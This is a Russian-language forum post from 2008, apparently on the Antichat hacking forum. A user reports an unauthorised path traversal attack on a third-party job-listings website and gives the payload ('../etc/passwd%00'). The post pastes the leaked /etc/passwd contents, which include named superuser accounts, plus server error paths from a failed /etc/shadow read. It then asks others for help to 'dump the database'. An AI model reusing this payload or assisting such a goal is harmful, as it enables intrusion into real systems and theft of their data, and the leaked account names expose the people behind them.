HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Проклятый etc/passwd
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Проклятый etc/passwd
  #1  
Старый 25.01.2008, 04:03
constanta
Познающий
Регистрация: 19.09.2007
Сообщений: 38
С нами: 9813214

Репутация: 2
По умолчанию Проклятый etc/passwd
Уважаемые Гуру. Прошу вашего совета вот в таком вот не легком для меня вопросе. Мною была найдена уязвимость на одном достаточно известном ресурсе.
Вот такая вот беда.
Цитата:
../../../../../../../../etc/passwd%00
Отсюда мы получили вот что
Цитата:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2aemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false games:x:12:100:Games account:/var/games:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false ntp:x:74:65534:NTP daemon:/var/lib/ntp:/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false haldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/false heinze:x:0:0:Markus Heinze (superuser):/home/heinze:/bin/bash fischer:x:0:0:Elmar Fischer (superuser):/home/fischer:/bin/bash spannage:x:0:0:Alexander Spannagel (superuser):/home/spannage:/bin/bash herguth:x:0:0:Christian Herguth (superuser):/home/herguth:/bin/bash man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash wwwrun:x:501:110:Apache Daemon:/home/wwwrun:/bin/bash wwwadmin:x:502:110:WWW Content Owner:/home/wwwadmin:/bin/bash mysql:x:503:112:MySQL Daemon:/home/mysql:/bin/bash schaefer:x:0:0::/home/schaefer:/bin/bash
Я в этом деле нюб полный.
Послушайте пожалуйста что я делал и посоветуйте пожалуйста что же надо всетаки сделать. Цель - слить дамп.

Итак: shadow и master.shadow не канает вот такая вот ошибочка выскакивает
Цитата:
Warning: file_get_contents(/JobsAdverts/OnlineServer/xsl/generic/regional/maps/../../../../../../../../../../../..../../../../../../../../../../../../etc/shadow) [function.file-get-contents]: failed to open stream: Keine Berechtigung in /JobsAdverts/OnlineServer/include/generic/class/RegionalSearchXMLRenderer.php on line 976

Warning: Cannot modify header information - headers already sent by (output started at /JobsAdverts/OnlineServer/include/generic/class/RegionalSearchXMLRenderer.php:976) in /JobsAdverts/OnlineServer/include/generic/class/RegionalSearchProcess.php on line 860
Удалось прочитать такую хрень из /etc
Цитата:
-- fdprm --group -- issue -- magic --motd -- login.defs --csh.login --csh.cshrc --securetty --resolv.conf --hosts -- nntpserver --profile.dcsh.ssh -- inputrc --host.conf --nsswitch.conf --rpc -- aliases
методом подбора. С других каталогов прочитать ничего не получается. Ничего путного я не нашел там. ТО ли плохо искал то ли просто не могу понять что для меня должно представлять ценность)) Брутфорсить пароли не сильно хочется.

Я уверен что при вашем богатом опыте вы не однократно сталкивались с такой проблемой. И хотелось бы услышать ваше мнение.


P.S. Прошу модераторов проявить сострадание к моему творчеству и ко мне лично ))) и не удалять данный призыв о помощи

С уважением, Cos®
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
etc/passwd Tigger Уязвимости 33 14.11.2008 14:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.